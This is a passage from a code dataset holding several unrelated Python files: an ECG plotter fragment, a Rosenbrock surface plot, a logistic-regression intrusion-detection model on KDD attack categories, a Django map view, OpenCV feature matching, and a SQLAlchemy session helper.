len(rrmean_up_plots)],\n y=rrmean_up_plots,\n name='Limite MEAN R-R'\n )\n rrmean_down_plots = []\n rrmean_down_plots.append(rrmean_plots[plot_cont]*0.85)\n rrmean_down_plots = 
rrmean_down_plots*len(rr_variability_plots[plot_cont])\n \n event_trace4 = graph_objs.Scatter(\n x=[0, len(rrmean_down_plots)],\n y=rrmean_down_plots,\n name='Limite MEAN R-R'\n )\n\n #---------------------------------------------------------\n x_rrv_plots = range(0, len(rr_variabilitysum_plots[plot_cont]))\n rr_up_plots = [0.8]*len(x_rrv_plots)\n event_trace5 = graph_objs.Scatter(\n x=x_rrv_plots[plot_cont],\n y=rr_variabilitysum_plots[plot_cont],\n mode='markers',\n name='Suma de Variabilidad R-R'\n )\n event_trace6 = graph_objs.Scatter(\n x=[0, len(rr_up_plots)],\n y=rr_up_plots,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R (propio)'\n )\n\n subplot_titles = ('Evento: del segundo '+ str(int(tiempos_plot[0]))+' - al segundo '+str(int(tiempos_plot[1])), \n 'R-R Variabilidad')\n event_fig = tools.make_subplots(rows=3, cols=1, subplot_titles=subplot_titles)\n event_fig.append_trace(event_trace, 1, 1)\n event_fig.append_trace(event_trace2, 2, 1)\n event_fig.append_trace(event_trace3, 2, 1)\n event_fig.append_trace(event_trace4, 2, 1)\n event_fig.append_trace(event_trace5, 3, 1)\n event_fig.append_trace(event_trace6, 3, 1)\n event_fig['layout']['xaxis1'].update(title='Segundos')\n event_plot = plot(event_fig, output_type='div', include_plotlyjs=False)\n event_plots.append(event_plot)\n plot_cont += 1\n # --------------------------------------------------\n return plot_div, values, event_plots", "sub_path": "apps/information/utils/ecg_plotter.py", "file_name": "ecg_plotter.py", "file_ext": "py", "file_size_in_byte": 18743, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 74, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 75, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 78, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 85, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 182, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 182, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "detect_peaks.detect_peaks", "line_number": 210, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 352, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 352, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 357, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 357, "usage_type": 
"name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 375, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 375, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 381, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 381, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 387, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 387, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 402, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 402, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 408, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 408, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 413, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 413, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 420, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 420, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 435, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 447, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 447, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 455, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 455, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 466, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 466, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 475, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 475, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 484, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 484, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 490, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 490, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 498, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 498, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 506, "usage_type": "call"}]}
+{"seq_id": "390541034", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 15:17:43 2017\n\n@author: Mike\n\"\"\"\n\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\ndef first(x, y):\n return (100 *(y-x**2)**2 + (1-x)**2)\nx = arange(-6.0,5.0,0.1)\ny = arange(-6.0,5.0,0.1)\nX,Y = meshgrid(x, y) \nZ = first(X, Y)\n'''\nim = imshow(Z,cmap=cm.RdBu) # drawing the function\n# adding the Contour lines with labels\ncset = contour(Z,arange(-1,1.5,0.2),linewidths=2,cmap=cm.Set2)\nplt([1],[1])\nclabel(cset,inline=True,fmt='%1.1f',fontsize=10)\ncolorbar(im) # adding the colobar on the right\n# latex fashion title\ntitle('$z=(1-x^2+y^3) e^{-(x^2+y^2)/2}$')\nshow()\n'''\nfig = plt.figure()\nax = fig.gca(projection='3d')\nsurf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, \n cmap=cm.RdBu,linewidth=0, antialiased=False)\nax.plot([1],[1],'go')\nax.zaxis.set_major_locator(LinearLocator(10))\nax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\nfig.colorbar(surf, shrink=.5, aspect=5)\nplt.show()", "sub_path": "Numerical Optimization Problems/first.py", "file_name": "first.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.ticker.LinearLocator", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "132179668", "text": "from sklearn.datasets import fetch_openml\nimport pandas as pd\nimport numpy as np\nimport pickle\n\ndata = '''back dos\nbuffer_overflow u2r\nftp_write r2l\nguess_passwd r2l\nimap r2l\nipsweep probe\nland dos\nloadmodule u2r\nmultihop r2l\nneptune dos\nnmap probe\nperl u2r\nphf r2l\npod dos\nportsweep probe\nrootkit u2r\nsatan probe\nsmurf dos\nspy r2l\nteardrop dos\nwarezclient r2l\nwarezmaster r2l'''\n\n# grouped by type\nattack_types = pd.DataFrame([row.split() for row in data.split('\\n')], columns=['name','type'])\nattack_type_groups = attack_types.groupby('type')['name'].unique()\n\nprint('attack group types: {}'.format(', '.join(attack_type_groups.index)))\nprint()\nprint(attack_type_groups)\n\n#X = features\n#y = label (target)\nfrom sklearn.datasets import fetch_openml\nX, y = fetch_openml(data_id='1113', return_X_y=True, as_frame=True)\nprint('n records: {}'.format(len(X.index)))\nX_preserved = X.copy()\ny_preserved = y.copy()\n\ndef get_attack_type_downsampled_balanced_subset(attack_names, label, X, y):\n print('Attack group name: {}'.format(label))\n print('Attack_types: {}'.format(', '.join(attack_names)))\n \n is_type_attack = y.isin(attack_names)\n \n only_attack_type = y[is_type_attack]\n only_not_attack_type = y[~is_type_attack]\n \n only_attack_type = is_type_attack[is_type_attack]\n only_not_attack_type = is_type_attack[~is_type_attack]\n \n \n num_attack_type = only_attack_type.shape[0]\n num_not_attack_type = only_not_attack_type.shape[0]\n \n print('Num attack type: {}'.format(num_attack_type))\n print('Num not attack type: {}'.format(num_not_attack_type))\n \n\n # Take a balanced sample\n # which one has less? that is the one we should downsample\n lowest_count = min(num_attack_type, num_not_attack_type)\n \n balanced_ys = []\n balanced_Xs = []\n for subset_y in [only_attack_type, only_not_attack_type]:\n _subset_y = subset_y.copy()\n if _subset_y.shape[0] > lowest_count:\n _subset_y = subset_y.sample(n=lowest_count)\n subset_X = X.loc[_subset_y.index, :]\n balanced_Xs.append(subset_X)\n balanced_ys.append(_subset_y)\n \n assert len(balanced_Xs) == len(balanced_ys)\n \n for i, balanced_y in enumerate(balanced_ys):\n assert balanced_y.shape[0] == lowest_count\n assert balanced_Xs[i].shape[0] == lowest_count\n \n X_new = pd.concat(balanced_Xs)\n y_new = pd.concat(balanced_ys).rename(label)\n \n print(X_new.shape[0])\n print(y_new.shape[0])\n print()\n \n return X_new, y_new\n\nX_is_dos, y_is_dos = get_attack_type_downsampled_balanced_subset(attack_type_groups['dos'], 'is_dos_attack', X, y)\nX_is_probe, y_is_probe = get_attack_type_downsampled_balanced_subset(attack_type_groups['probe'], 'is_probe_attack', X, y)\nX_is_r2l, y_is_r2l = get_attack_type_downsampled_balanced_subset(attack_type_groups['r2l'], 'is_r2l_attack', X, y)\nX_is_u2r, y_is_u2r = get_attack_type_downsampled_balanced_subset(attack_type_groups['u2r'], 'is_u2r_attack', X, y)\n\nX, y = X_is_probe, y_is_probe\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression, RidgeClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import 
GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\nnp.random.seed(0)\n\n#column transformer\n\nnumeric_features = ['src_bytes','dst_bytes']\nnumeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])\n\ncategorical_features = ['protocol_type']\n#categorical_features = []\ncategorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n\npreprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)])\n\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import plot_precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import log_loss\nfrom sklearn.metrics import roc_auc_score, roc_curve, auc\nimport matplotlib.pyplot as plt\n\nclassifiers = [\n LogisticRegression()\n]\n\nclf = Pipeline(steps=[('preprocessor', preprocessor),\n ('clf', None)])\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=0)\n\nprint('Training Features Shape:', X_train.shape)\nprint('Training Labels Shape:', y_train.shape)\nprint('Testing Features Shape:', X_test.shape)\nprint('Testing Labels Shape:', y_test.shape)\n\nroc_things = []\nprecision_recall_things = []\n\nfor classifier in classifiers:\n clf.set_params(clf=classifier).fit(X_train, y_train)\n classifier_name = classifier.__class__.__name__\n print(str(classifier))\n print(\"model score: %.3f\" % clf.score(X_test, y_test))\n\n y_score = clf.predict_proba(X_test)[:,1]\n\n y_pred = clf.predict(X_test)\n \n roc_auc = roc_auc_score(y_test, y_score)\n fpr, tpr, _ = roc_curve(y_test, y_score)\n roc_things.append((fpr, tpr, '{} AUC: {:.3f}'.format(classifier_name, roc_auc)))\n \n precision, recall, thresholds = precision_recall_curve(y_test, y_score)\n pr_auc = auc(recall, precision)\n precision_recall_things.append((recall, precision, thresholds, '{} AUC: {:.3f}'.format(classifier_name, pr_auc)))\n #plot_precision_recall_curve(clf, X_test, y_test)\n \n print(confusion_matrix(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n\n print('average precision score: {:.3f}'.format(average_precision_score(y_test, y_score)))\n print('roc_auc_score: {:.3f}'.format(roc_auc))\n print('precision-recall AUC: {:.3f}'.format(pr_auc))\n print()\n\nroc_plt = plt.figure()\nlw = 4\nfor roc_thing in roc_things:\n fpr, tpr, label = roc_thing\n plt.plot(fpr, tpr, lw=lw, label=label)\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.legend()\nplt.title('ROC curve')\n\npr_plt = plt.figure()\nfor pr_thing in precision_recall_things:\n recall, precision, _, label = pr_thing\n plt.plot(recall, precision, lw=lw, label=label)\nratio = y_test[y_test].shape[0] / y_test.shape[0]\nplt.hlines(y=ratio, xmin=0, xmax=1, color='navy', lw=lw, linestyle='--')\nplt.title('Precision-recall plot')\nplt.legend()\n\nwith open('{}.pkl'.format(classifier_name), 'wb') as f:\n pickle.dump(clf, f)", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 7021, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 174, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_curve", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 183, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.metrics.average_precision_score", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.legend", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 210, "usage_type": "call"}]}
+{"seq_id": "238273921", "text": "from django.shortcuts import render\n\nfrom about.forms import CommentForm\nfrom about.models import Comment\nfrom map.forms import MarkForm\nfrom map.models import MapMarks\nfrom django.http import JsonResponse\n\ndef Map(request):\n if request.method == \"GET\":\n if request.is_ajax():\n if request.GET[\"type\"] == '1':\n mark = MapMarks.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(mark.first())\n else:\n comment = Comment.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(comment.first())\n else:\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n form_comment = CommentForm()\n form_mark = MarkForm()\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form_comment\": form_comment, \"form_mark\": form_mark})\n else:\n if (request.POST[\"type\"] == 1):\n data = CommentForm(request.POST)\n else:\n data = MarkForm(request.POST, request.FILES)\n\n if (data.data[\"type\"] == '1'):\n comment = Comment()\n comment.comment = data.data[\"comment\"]\n comment.username = data.data[\"username\"]\n comment.id_mark = data.data[\"id_mark\"]\n mark = MapMarks.objects.get(id = data.data[\"id_mark\"])\n comment.save()\n mark.id_comment = mark.id_comment + str(comment.id) + '_'\n mark.save()\n else:\n mark = MapMarks()\n mark.comment = data.data[\"comment\"]\n mark.name = data.data[\"name\"]\n mark.image = data.files[\"image\"]\n mark.position_y = float(data.data[\"position_y\"])\n mark.position_x = float(data.data[\"position_x\"])\n mark.save()\n form = CommentForm()\n form_mark = MarkForm()\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form\": form, \"form_mark\": form_mark})", "sub_path": "map/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "map.models.MapMarks.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 13, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 14, "usage_type": "call"}, {"api_name": "about.models.Comment.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "about.models.Comment.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "about.models.Comment", "line_number": 16, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 19, "usage_type": "name"}, {"api_name": "about.forms.CommentForm", "line_number": 20, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 25, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 27, "usage_type": "call"}, {"api_name": "about.models.Comment", "line_number": 30, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.get", "line_number": 34, "usage_type": 
"call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 34, "usage_type": "name"}, {"api_name": "map.models.MapMarks", "line_number": 39, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 46, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 47, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "644688010", "text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport matcher\nfig = plt.figure()\n\ndef camera_capture():\n cap = cv2.VideoCapture(0)\n\n while True:\n ret, frame = cap.read()\n \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n fig.add_subplot(1, 2, 1)\n cv2.imshow('bgr', frame)\n fig.add_subplot(1, 2, 2)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n\ndef normalized(img):\n # half-sampling\n img = cv2.resize(img, (0, 0), fx = 0.5, fy = 0.5)\n # filter\n kernel_size = 2\n kernel = np.ones((kernel_size, kernel_size), np.float32) / (kernel_size ** 2)\n img = cv2.filter2D(img, -1, kernel)\n return img\n\ndef fast_matching():\n fast = cv2.FastFeatureDetector_create(type = cv2.FastFeatureDetector_TYPE_7_12, nonmaxSuppression = True)\n img_src = cv2.imread('./resource/P_20180407_120033.jpg', 0);\n img_dst = cv2.imread('./resource/P_20180407_120034.jpg', 0);\n\n # normalize\n img_src = normalized(img_src)\n img_dst = normalized(img_dst)\n \n # get keypoints\n kp_src = fast.detect(img_src, None)\n kp_dst = fast.detect(img_dst, None)\n\n # matching\n matchX, matchY, cost_mat = matcher.stable_SSD(img_src, kp_src, img_dst, kp_dst, max_dist = 25)\n dmatch = [cv2.DMatch(i, matchX[i], cost_mat[i][matchX[i]]) for i in range(len(kp_src)) if matchX[i] < len(kp_dst)]\n dmatch.sort(key = lambda x: x.distance)\n \n # draw matches\n img_res = cv2.drawMatches(img_src, kp_src, img_dst, kp_dst, dmatch[:int(0.2 * len(dmatch))], outImg = None, flags = 2)\n \n# fig.add_subplot(1, 2, 1)\n# plt.imshow(img_src)\n# fig.add_subplot(1, 2, 2)\n# plt.imshow(img_dst)\n plt.imshow(img_res)\n\n mng = plt.get_current_fig_manager()\n mng.resize(*mng.window.maxsize())\n\nfast_matching()\nplt.show()\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1920, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.filter2D", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_create", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_TYPE_7_12", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "matcher.stable_SSD", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.DMatch", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.drawMatches", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 58, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.get_current_fig_manager", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "514508946", "text": "import time\n\nfrom oslo_log import log as logging\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.exc import DisconnectionError, OperationalError\nfrom sqlalchemy.orm import sessionmaker\n\nfrom conch import cfg\n\nconf = cfg.CONF.database\nLOG = logging.getLogger(__name__)\n\n_ENGINE = None\n_MAKER = None\n\n\ndef get_session(autocommit=True, expire_on_commit=False):\n global _MAKER\n\n if _MAKER is None:\n engine = get_engine()\n _MAKER = get_maker(engine, autocommit, expire_on_commit)\n\n session = _MAKER()\n return session\n\n\ndef ping_listener(dbapi_conn, connection_rec, connection_proxy):\n try:\n dbapi_conn.cursor().execute('select 1')\n except dbapi_conn.OperationalError as ex:\n if ex.args[0] in (2006, 2013, 2014, 2045, 2055):\n LOG.warn('Got mysql server has gone away: %s', ex)\n raise DisconnectionError(\"Database server went away\")\n else:\n raise\n\n\ndef is_db_connection_error(args):\n conn_err_codes = ('2002', '2003', '2006')\n for err_code in conn_err_codes:\n if args.find(err_code) != -1:\n return True\n return False\n\n\ndef get_engine():\n global _ENGINE\n if _ENGINE is None:\n\n engine_args = {\n \"pool_recycle\": conf.sql_idle_timeout,\n \"echo\": False,\n 'convert_unicode': True,\n \"pool_size\": conf.sql_pool_size,\n \"max_overflow\": conf.sql_max_overflow,\n }\n\n if conf.sql_connection_debug >= 100:\n engine_args['echo'] = 'debug'\n elif conf.sql_connection_debug >= 50:\n engine_args['echo'] = True\n\n _ENGINE = create_engine(conf.sql_connection, **engine_args)\n\n listen(_ENGINE, 'checkout', ping_listener)\n\n try:\n _ENGINE.connect()\n except OperationalError as e:\n if not is_db_connection_error(e.args[0]):\n raise\n\n remaining = conf.sql_max_retries\n if remaining == -1:\n remaining = 'infinite'\n while True:\n msg = ('SQL connection failed. %s attempts left.')\n LOG.warn(msg % remaining)\n if remaining != 'infinite':\n remaining -= 1\n time.sleep(conf.sql_retry_interval)\n try:\n _ENGINE.connect()\n break\n except OperationalError as e:\n if (remaining != 'infinite' and remaining == 0) or \\\n not is_db_connection_error(e.args[0]):\n raise\n return _ENGINE\n\n\ndef get_maker(engine, autocommit=True, expire_on_commit=False):\n return sessionmaker(bind=engine,\n autocommit=autocommit,\n expire_on_commit=expire_on_commit)\n", "sub_path": "conch/db/sqlalchemy/session.py", "file_name": "session.py", "file_ext": "py", "file_size_in_byte": 2830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "conch.cfg.CONF", "line_number": 11, "usage_type": "attribute"}, {"api_name": "conch.cfg", "line_number": 11, "usage_type": "name"}, {"api_name": "oslo_log.log.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 12, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.DisconnectionError", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.event.listen", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 71, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 87, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 95, "usage_type": "call"}]}
